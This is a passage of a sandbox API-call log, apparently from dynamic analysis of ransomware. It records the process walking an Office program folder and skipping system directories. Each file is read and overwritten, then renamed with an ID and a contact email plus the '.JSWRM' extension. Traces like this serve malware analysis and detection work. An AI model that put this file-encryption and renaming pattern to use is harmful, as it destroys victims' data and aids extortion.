lpOverlapped=0x0) returned 1 [0142.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0142.669] CloseHandle (hObject=0x238) returned 1 [0142.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0142.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0142.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0142.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0142.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0142.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0142.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0142.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0142.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0142.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0142.669] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PS9CRNRH.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\ps9crnrh.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PS9CRNRH.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\ps9crnrh.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0142.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0142.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0142.670] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23441541, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23441541, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23467797, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PULLQUOTEBB.DPV", cAlternateFileName="PULLQU~1.DPV")) returned 1 [0142.670] lstrcmpiW (lpString1="PULLQUOTEBB.DPV", lpString2=".") returned 1 [0142.670] lstrcmpiW (lpString1="PULLQUOTEBB.DPV", lpString2="..") returned 1 [0142.670] lstrcmpiW (lpString1="PULLQUOTEBB.DPV", lpString2="...") returned 1 [0142.671] lstrcmpiW (lpString1="PULLQUOTEBB.DPV", lpString2="windows") returned -1 [0142.671] lstrcmpiW (lpString1="PULLQUOTEBB.DPV", lpString2="recovery") returned -1 [0142.671] lstrcmpiW (lpString1="PULLQUOTEBB.DPV", lpString2="perflogs") returned 1 [0142.671] lstrcmpiW (lpString1="PULLQUOTEBB.DPV", lpString2="documents and settings") returned 1 [0142.671] lstrcmpiW (lpString1="PULLQUOTEBB.DPV", lpString2="$RECYCLE.BIN") returned 1 [0142.671] lstrcmpiW (lpString1="PULLQUOTEBB.DPV", lpString2="system volume information") returned -1 [0142.671] lstrcmpiW (lpString1="PULLQUOTEBB.DPV", lpString2="msocache") returned 1 [0142.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0142.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PULLQUOTEBB.DPV", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0142.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PULLQUOTEBB.DPV", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PULLQUOTEBB.DPV", lpUsedDefaultChar=0x0) returned 15 [0142.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0142.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0142.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PULLQUOTEBB.DPV", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0142.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PULLQUOTEBB.DPV", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PULLQUOTEBB.DPV", lpUsedDefaultChar=0x0) returned 15 [0142.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0142.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0142.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0142.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0142.671] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PULLQUOTEBB.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\pullquotebb.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.673] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4608) returned 1 [0142.673] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1200) returned 0x27b348 [0142.673] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1200, lpOverlapped=0x0) returned 1 [0142.674] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.674] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1200, lpOverlapped=0x0) returned 1 [0142.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0142.675] CloseHandle (hObject=0x238) returned 1 [0142.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0142.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0142.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0142.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0142.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0142.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0142.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0142.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0142.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0142.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0142.675] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PULLQUOTEBB.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\pullquotebb.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PULLQUOTEBB.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\pullquotebb.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0142.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0142.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0142.676] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23441541, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23441541, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23467797, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x18c0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PULLQUOTEBB.POC", cAlternateFileName="PULLQU~1.POC")) returned 1 [0142.676] lstrcmpiW (lpString1="PULLQUOTEBB.POC", lpString2=".") returned 1 [0142.676] lstrcmpiW (lpString1="PULLQUOTEBB.POC", lpString2="..") returned 1 [0142.676] lstrcmpiW (lpString1="PULLQUOTEBB.POC", lpString2="...") returned 1 [0142.676] lstrcmpiW (lpString1="PULLQUOTEBB.POC", lpString2="windows") returned -1 [0142.676] lstrcmpiW (lpString1="PULLQUOTEBB.POC", lpString2="recovery") returned -1 [0142.676] lstrcmpiW (lpString1="PULLQUOTEBB.POC", lpString2="perflogs") returned 1 [0142.676] lstrcmpiW (lpString1="PULLQUOTEBB.POC", lpString2="documents and settings") returned 1 [0142.676] lstrcmpiW (lpString1="PULLQUOTEBB.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.676] lstrcmpiW (lpString1="PULLQUOTEBB.POC", lpString2="system volume information") returned -1 [0142.676] lstrcmpiW (lpString1="PULLQUOTEBB.POC", lpString2="msocache") returned 1 [0142.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0142.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PULLQUOTEBB.POC", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0142.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PULLQUOTEBB.POC", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PULLQUOTEBB.POC", lpUsedDefaultChar=0x0) returned 15 [0142.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0142.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0142.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PULLQUOTEBB.POC", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0142.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PULLQUOTEBB.POC", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PULLQUOTEBB.POC", lpUsedDefaultChar=0x0) returned 15 [0142.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0142.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0142.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0142.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0142.677] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PULLQUOTEBB.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\pullquotebb.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.678] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6336) returned 1 [0142.678] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x18c0) returned 0x27b348 [0142.678] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x18c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x18c0, lpOverlapped=0x0) returned 1 [0142.679] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.679] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x18c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x18c0, lpOverlapped=0x0) returned 1 [0142.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0142.680] CloseHandle (hObject=0x238) returned 1 [0142.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0142.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0142.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0142.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0142.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0142.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0142.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0142.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0142.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0142.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0142.680] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PULLQUOTEBB.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\pullquotebb.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PULLQUOTEBB.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\pullquotebb.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0142.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0142.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0142.681] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23441541, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23441541, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23467797, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbb68, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PULQOT98.POC", cAlternateFileName="")) returned 1 [0142.681] lstrcmpiW (lpString1="PULQOT98.POC", lpString2=".") returned 1 [0142.681] lstrcmpiW (lpString1="PULQOT98.POC", lpString2="..") returned 1 [0142.681] lstrcmpiW (lpString1="PULQOT98.POC", lpString2="...") returned 1 [0142.681] lstrcmpiW (lpString1="PULQOT98.POC", lpString2="windows") returned -1 [0142.681] lstrcmpiW (lpString1="PULQOT98.POC", lpString2="recovery") returned -1 [0142.681] lstrcmpiW (lpString1="PULQOT98.POC", lpString2="perflogs") returned 1 [0142.681] lstrcmpiW (lpString1="PULQOT98.POC", lpString2="documents and settings") returned 1 [0142.682] lstrcmpiW (lpString1="PULQOT98.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.682] lstrcmpiW (lpString1="PULQOT98.POC", lpString2="system volume information") returned -1 [0142.682] lstrcmpiW (lpString1="PULQOT98.POC", lpString2="msocache") returned 1 [0142.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0142.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PULQOT98.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PULQOT98.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PULQOT98.POC", lpUsedDefaultChar=0x0) returned 12 [0142.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0142.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0142.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PULQOT98.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PULQOT98.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PULQOT98.POC", lpUsedDefaultChar=0x0) returned 12 [0142.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0142.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0142.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0142.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0142.682] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PULQOT98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\pulqot98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.683] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=47976) returned 1 [0142.683] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbb60) returned 0x27b348 [0142.683] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xbb60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xbb60, lpOverlapped=0x0) returned 1 [0142.687] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.687] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xbb60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xbb60, lpOverlapped=0x0) returned 1 [0142.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0142.687] CloseHandle (hObject=0x238) returned 1 [0142.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0142.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0142.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0142.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0142.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0142.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0142.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0142.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 